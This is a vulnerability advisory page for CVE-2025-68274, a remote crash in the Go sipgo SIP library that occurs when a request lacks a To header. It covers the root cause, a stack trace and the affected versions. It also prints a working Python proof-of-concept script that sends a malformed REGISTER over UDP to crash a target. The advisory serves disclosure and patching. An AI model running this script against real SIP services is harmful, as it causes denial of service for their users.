GHSA-C623-F998-8HHV

Vulnerability from github – Published: 2025-12-16 21:24 – Updated: 2025-12-20 03:33
VLAI?
Summary
SIPGO is Vulnerable to Response DoS via Nil Pointer Dereference
Details

Description

A nil pointer dereference vulnerability was discovered in the SIPGO library's NewResponseFromRequest function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.

The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases.

Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the NewResponseFromRequest function.

Technical details

The vulnerability is located in /sip/response.go at line 242 in the NewResponseFromRequest function:

if _, ok := res.To().Params["tag"]; !ok {
    uuid, _ := uuid.NewRandom()
    res.to.Params["tag"] = uuid.String()
}

Root Cause:

  1. Missing To Header: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.

  2. Header Copying Logic: During response creation in NewResponseFromRequest, the code attempts to copy headers from the request to the response. Since there's no To header in the request, no To header is copied to the response.

  3. Unsafe Assumption: The response creation code assumes the To header exists and calls res.To().Params["tag"] without checking if res.To() returns nil, causing a nil pointer dereference.

Stack Trace:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]

goroutine 175 [running]:
github.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})
    /Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394

Impact

This vulnerability affects all SIP applications using the sipgo library when using NewResponseFromRequest to generate SIP responses.

Attack Impact: - Availability: Complete denial of service - application crashes immediately - Remote Exploitation: Yes - Authentication Required: No - vulnerability triggers during initial response generation which does not require authentication

How to reproduce the issue

To reproduce this issue, you need:

  1. A SIP application using the vulnerable sipgo library
  2. Network access to send SIP messages to the target

Steps:

  1. Save the following Python script as sipgo-response-dos.py:

    ```python

    !/usr/bin/env python3

    import socket import sys import time import random

    def create_malformed_register(target_ip, target_port): call_id = f"sipgo-dos-{int(time.time())}" tag = f"sipgo-dos-{random.randint(1000, 9999)}" branch = f"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}"

    # Craft malformed SIP request without To header
sip_message = (
    f"REGISTER sip:{target_ip}:{target_port} SIP/2.0\r\n"
    f"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\r\n"
    f"From: <sip:attacker@192.168.1.100>;tag={tag}\r\n"
    f"Call-ID: {call_id}\r\n"
    f"CSeq: 1 REGISTER\r\n"
    f"Contact: <sip:attacker@192.168.1.100:5060>\r\n"
    f"Content-Length: 0\r\n"
    f"\r\n"
)
return sip_message

    if name == "main": if len(sys.argv) != 3: print("Usage: python3 sipgo-response-dos.py ") sys.exit(1)

    target_ip = sys.argv[1]
target_port = int(sys.argv[2])

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
payload = create_malformed_register(target_ip, target_port)

print(f"Sending malformed REGISTER to {target_ip}:{target_port}")
sock.sendto(payload.encode('utf-8'), (target_ip, target_port))
print("Exploit sent - target should crash immediately")

    ```

  2. Run the script against a vulnerable sipgo application:

    bash python3 sipgo-response-dos.py <target_ip> <target_port>

  3. Observe that the target application crashes with a SIGSEGV panic.

Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.

Severity ?
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/emiago/sipgo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.3.0"
            },
            {
              "fixed": "1.0.0-alpha-1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68274"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-16T21:24:16Z",
    "nvd_published_at": "2025-12-16T22:15:50Z",
    "severity": "HIGH"
  },
  "details": "### Description\n\nA nil pointer dereference vulnerability was discovered in the SIPGO library\u0027s `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.\n\nThe vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases.\n\n\u003e Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function.\n\n### Technical details\n\nThe vulnerability is located in `/sip/response.go` at line 242 in the `NewResponseFromRequest` function:\n\n```go\nif _, ok := res.To().Params[\"tag\"]; !ok {\n    uuid, _ := uuid.NewRandom()\n    res.to.Params[\"tag\"] = uuid.String()\n}\n```\n\n**Root Cause:**\n\n1. **Missing To Header**: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.\n\n2. **Header Copying Logic**: During response creation in `NewResponseFromRequest`, the code attempts to copy headers from the request to the response. Since there\u0027s no To header in the request, no To header is copied to the response.\n\n3. **Unsafe Assumption**: The response creation code assumes the To header exists and calls `res.To().Params[\"tag\"]` without checking if `res.To()` returns `nil`, causing a nil pointer dereference.\n\n**Stack Trace:**\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]\n\ngoroutine 175 [running]:\ngithub.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})\n    /Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394\n```\n\n### Impact\n\nThis vulnerability affects **all SIP applications using the sipgo library when using NewResponseFromRequest to generate SIP responses**.\n\n**Attack Impact:**\n- **Availability**: Complete denial of service - application crashes immediately\n- **Remote Exploitation**: Yes\n- **Authentication Required**: No - vulnerability triggers during initial response generation which does not require authentication\n\n\n### How to reproduce the issue\n\nTo reproduce this issue, you need:\n\n1. A SIP application using the vulnerable sipgo library\n2. Network access to send SIP messages to the target\n\nSteps:\n\n1. Save the following Python script as `sipgo-response-dos.py`:\n\n    ```python\n    #!/usr/bin/env python3\n    import socket\n    import sys\n    import time\n    import random\n\n    def create_malformed_register(target_ip, target_port):\n        call_id = f\"sipgo-dos-{int(time.time())}\"\n        tag = f\"sipgo-dos-{random.randint(1000, 9999)}\"\n        branch = f\"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}\"\n        \n        # Craft malformed SIP request without To header\n        sip_message = (\n            f\"REGISTER sip:{target_ip}:{target_port} SIP/2.0\\r\\n\"\n            f\"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\\r\\n\"\n            f\"From: \u003csip:attacker@192.168.1.100\u003e;tag={tag}\\r\\n\"\n            f\"Call-ID: {call_id}\\r\\n\"\n            f\"CSeq: 1 REGISTER\\r\\n\"\n            f\"Contact: \u003csip:attacker@192.168.1.100:5060\u003e\\r\\n\"\n            f\"Content-Length: 0\\r\\n\"\n            f\"\\r\\n\"\n        )\n        return sip_message\n\n    if __name__ == \"__main__\":\n        if len(sys.argv) != 3:\n            print(\"Usage: python3 sipgo-response-dos.py \u003ctarget_ip\u003e \u003ctarget_port\u003e\")\n            sys.exit(1)\n        \n        target_ip = sys.argv[1]\n        target_port = int(sys.argv[2])\n        \n        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n        payload = create_malformed_register(target_ip, target_port)\n        \n        print(f\"Sending malformed REGISTER to {target_ip}:{target_port}\")\n        sock.sendto(payload.encode(\u0027utf-8\u0027), (target_ip, target_port))\n        print(\"Exploit sent - target should crash immediately\")\n    ```\n\n\n2. Run the script against a vulnerable sipgo application:\n\n    ```bash\n    python3 sipgo-response-dos.py \u003ctarget_ip\u003e \u003ctarget_port\u003e\n    ```\n\n3. Observe that the target application crashes with a SIGSEGV panic.\n\n\u003e Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.",
  "id": "GHSA-c623-f998-8hhv",
  "modified": "2025-12-20T03:33:26Z",
  "published": "2025-12-16T21:24:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/emiago/sipgo/security/advisories/GHSA-c623-f998-8hhv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68274"
    },
    {
      "type": "WEB",
      "url": "https://github.com/emiago/sipgo/commit/dc9669364a154ec6d134e542f6a63c31b5afe6e8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/emiago/sipgo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "SIPGO is Vulnerable to Response DoS via Nil Pointer Dereference"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.